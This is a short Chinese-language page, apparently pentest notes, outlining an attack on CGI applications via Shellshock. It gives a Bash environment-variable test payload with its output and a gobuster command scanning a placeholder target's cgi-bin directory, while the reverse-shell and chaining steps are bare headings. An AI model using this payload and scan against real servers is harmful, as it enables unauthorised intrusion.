攻擊通用網關介面 (CGI) 應用程式 - Shellshock
1. 發現點
2. 測試Payload
env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"vulnerable-shellshock
not vulnerable3. 掃描路徑
gobuster dir -u http://<target>/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi4. 確認漏洞
5. 利用取得反向 shell
5. 連鎖漏洞
步驟
攻擊目標
工具/命令範例
最后更新于
这有帮助吗?